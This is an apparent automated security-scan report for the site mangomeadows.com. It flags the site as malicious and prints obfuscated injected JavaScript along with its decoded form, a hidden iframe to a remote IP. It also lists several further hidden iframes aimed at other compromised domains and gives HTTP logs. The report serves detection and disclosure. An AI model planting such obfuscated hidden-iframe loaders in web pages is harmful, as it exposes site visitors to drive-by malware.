Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mangomeadows.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mangomeadows.com/ | 200 OK Content-Length: 6639 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
o='//';ni='2.4';ql='a.p';mh='.23';ag='p:';a='fr';wc='htt';m='i';v='hp';xj='0/';c='9.8';da='20';lq='c';q='sr';l='ame';r=m.concat(a,l);i=q.concat(lq);nj=wc.concat(ag,o,da,ni,mh,c,xj,ql,v);document.write('<'+r+' '+i+'="'+nj+'" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></'+r+'>');
Decoded script:
<iframe src="http://202.4.239.80/a.php" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></iframe>
Antivirus reports:
Hidden iFrame found. style: hidden src: http://newhorizonie.com.au/conn/
<iframe src="http://newhorizonie.com.au/conn/" style="position: absolute; top:-4000px; left:-4000px; visibility: hidden;">
Hidden iFrame found. style: hidden src: http://tognailbeauty.com.au/php.tmp.3607545789.php
<iframe src="http://tognailbeauty.com.au/php.tmp.3607545789.php" style="position: absolute; top:-1144px; left:-3548px; visibility: hidden;">
Hidden iFrame found. style: hidden src: http://fourbestthings.com/php.tmp.2595509314.php
<iframe src="http://fourbestthings.com/php.tmp.2595509314.php" style="position: absolute; top:-4799px; left:-1896px; visibility: hidden;">
Hidden iFrame found. style: hidden src: http://lotscleaner.com/php.tmp.4985971183.php
<iframe src="http://lotscleaner.com/php.tmp.4985971183.php" style="position: absolute; top:-1921px; left:-2395px; visibility: hidden;">
Hidden iFrame found. style: hidden src: http://stardivine.com/php.tmp.7207062425.php
<iframe src="http://stardivine.com/php.tmp.7207062425.php" style="position: absolute; top:-3606px; left:-2070px; visibility: hidden;">
http://j.maxmind.com/app/geoip.js | 404 Not Found Content-Length: 162 Content-Type: text/html | clean |
http://j.maxmind.com/test404page.js | 404 Not Found Content-Length: 522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mangomeadows.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:18:23 GMT
Accept-Ranges: bytes
ETag: "98327c-19ef-4e69d0a1a7fc9"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 6639
Content-Type: text/html
Last-Modified: Tue, 17 Sep 2013 23:54:20 GMT
...6639 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mangomeadows.com
Referer: http://www.google.com/search?q=mangomeadows.com
Result:
The result is similar to the first query. There are no suspicious redirects found.